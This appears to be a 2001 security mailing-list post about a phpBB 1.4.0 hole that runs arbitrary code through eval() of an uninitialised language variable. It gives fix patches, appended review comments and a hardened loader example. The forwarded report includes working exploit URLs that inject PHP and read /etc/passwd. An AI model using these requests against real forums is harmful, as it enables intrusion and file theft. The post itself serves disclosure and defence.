Hi all,

This is regarding a phpBB security hole found some months ago. Since this one came out, and the other (being a lot worse) didn't, I thought it might have some interest. This applies only to phpBB v1.4.0.

-----

----- Original Message -----
From: "UnderSpell" <underspellat_private>
To: <jamesat_private>
Sent: Thursday, May 17, 2001 12:15 PM
Subject: Security bug in phpBB

>
>
> Hi there!
>
> We've recently (actually not so recently) discovered a way to run any code
> using phpBB.
>
> The approach was very simple:
> At a given point you run an eval "eval($l_statsblock);".
> Since $l_statsblock is a language var we just have to find a way to set
> ourselves up with an invalid lang file:
> after login, go to user prefs and
> http://hacks.phpbb.com/phpBB/prefs.php?viewemail=1&savecookie=0&sig=0&smile=0&dishtml=0&disbbcode=0&themes=2&lang=THIS_IS_AN_INVALID_LANG_FILE&save=1&user=&submit=Gravar+Prefer%EAncias
> By this time $l_statsblock is no longer initialized so we can do funny
> stuff with them, like:
> http://hacks.phpbb.com/phpBB/prefs.php?l_statsblock=phpinfo();
> or
> http://hacks.phpbb.com/phpBB/prefs.php?teste=/etc/passwd&l_statsblock=include($teste);
> and so on ... we only checked the phpinfo against the hack forum and the second
> against my production and staging boards.
>
> You have two ways to fix this:
>
> 1 ) Check if lang file exists ( when trying to include )
>
> --- phpBB-1.4.0/auth.php Wed Apr 25 05:47:59 2001
> +++ phpBB/auth.php Thu May 17 12:11:01 2001
> @@ -273,16 +273,19 @@
> // Include the appropriate language file.
> if(!strstr($PHP_SELF, "admin"))
> {
> - include('language/lang_'.$default_lang.'.'.$phpEx);
> + $langfile = 'language/lang_'.$default_lang.'.'.$phpEx;
> }
> else
> {
> if(strstr($PHP_SELF, "topicadmin")) {
> - include('language/lang_'.$default_lang.'.'.$phpEx);
> - } else {
> - include('../language/lang_'.$default_lang.'.'.$phpEx);
> - }
> + $langfile ='language/lang_'.$default_lang.'.'.$phpEx;
> + } else {
> + $langfile = '../language/lang_'.$default_lang.'.'.$phpEx;
> + }
> }
> +
> + if ( ! file_exists($langfile) ) { die("Invalid Language");}
> + else { include($langfile); }
>
> // See if translated pictures are available..
> $header_image = get_translated_file($header_image);
>
>
> // See if translated pictures are available..
> $header_image = get_translated_file($header_image);
>
> 2 ) Initialize $l_statsblock before trying to include ( preferred )
>
> --- phpBB-1.4.0/auth.php Wed Apr 25 05:47:59 2001
> +++ phpBB/auth.php Thu May 17 11:39:33 2001
> @@ -269,6 +269,7 @@
> // set vars for all scripts
> $now_time = time();
> $last_visit = $temptime;
> +$l_statsblock = '';
>
> // Include the appropriate language file.
> if(!strstr($PHP_SELF, "admin"))
>
>
>
> Credits for this should go to tharbadat_private and UnderSpellat_private.
>
> (A)UnderSpell
> ---

----- Original Message -----
From: <kill-9at_private>
To: <bugtraqat_private>
Sent: Friday, August 03, 2001 8:51 PM
Subject: phpBB 1.4.0 bug leads to easy admin privileges

> -New phpBB 1.4.x exploit
> phpBB is an open source bulletin board created by the phpBB group.
> Version 1.4.x of phpBB has a variable input validation problem that can
> lead to limited arbitrary SQL queries including gaining administrative
> access to the board.

(...)

Best regards,

Joao Gouveia
--------------
tharbadat_private
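Review bot: in the first patch (the -273,16 +273,19 hunk), file_exists($langfile) only confirms that some file is at the path built from $default_lang; it does not confirm that $default_lang is one of the installed language names, and that value comes straight from user preferences. Validating the name against a fixed list of the shipped language files (or a pattern limited to letters, digits and underscore) before building the path is the stronger check. The `die("Invalid Language")` also aborts the request mid-page; falling back to the board's default language would keep the page rendering. Minor: `$langfile ='language/lang_'` is missing the space that the sibling assignment has.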
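Review bot: in the second patch (the -269,6 +269,7 hunk), `$l_statsblock = '';` neutralises only the one variable the report names; every other language variable that is later passed to eval() or used to build a path would need the same initialisation, and an include that fails still runs the rest of the script with an empty string. Applying this together with the existence check from the first patch (or an allowlist of language names) covers both the uninitialised variable and the invalid language file, rather than picking one as the message does.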
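The chain the forwarded report describes (a language name taken from user preferences selects an include, an invalid name makes the include fail, and eval($l_statsblock) then runs a value the client supplied, since PHP's register_globals turns a query-string parameter into a global) and a loader that closes each link, as an added example that is not phpBB's code; the directory layout, the name pattern, the default language and the function names are constructed assumptions:

```php
<?php
// Added example, not phpBB 1.4.0 code. The directory layout, the name
// pattern and the default language below are constructed assumptions.
//
// The report's chain: a user-chosen $lang selects the include, an invalid
// name makes the include fail, and eval($l_statsblock) then runs whatever
// the client sent (register_globals turns ?l_statsblock=... into a global).
// This loader breaks every link: strict name check, path confined to the
// language directory, variable initialised before the include, a fixed
// fallback instead of die(), and the value returned as data, never eval()ed.

function valid_language_name($lang)
{
    // letters, digits and underscore only, so no '/', '.' or NUL gets through
    return is_string($lang) && preg_match('/^[A-Za-z0-9_]{1,32}$/', $lang) === 1;
}

function language_file($lang, $dir)
{
    if (!valid_language_name($lang)) {
        return false;
    }
    $base = realpath($dir);
    $file = realpath($dir . '/lang_' . $lang . '.php');
    // realpath() resolves symlinks and '..'; anything outside $base is refused
    if ($base === false || $file === false
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $file;
}

function load_statsblock($lang, $dir = 'language', $default = 'english')
{
    $l_statsblock = '';                  // never inherit a request variable
    $file = language_file($lang, $dir);
    if ($file === false) {               // unknown language: use the default
        $file = language_file($default, $dir);
    }
    if ($file !== false) {
        include $file;                   // the language file assigns $l_statsblock
    }
    return (string) $l_statsblock;       // plain text for the caller to print
}

// Constructed checks: a bad name pattern and a name with no file both fail.
var_dump(valid_language_name('../secret'));                          // bool(false)
var_dump(language_file('THIS_IS_AN_INVALID_LANG_FILE', 'language')); // bool(false)
```

The caller substitutes its statistics into the returned string with str_replace() or sprintf() instead of eval(), which is what removes the code-execution path entirely rather than just guarding it.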
This archive was generated by hypermail 2b30 : Mon Aug 06 2001 - 02:36:23 PDT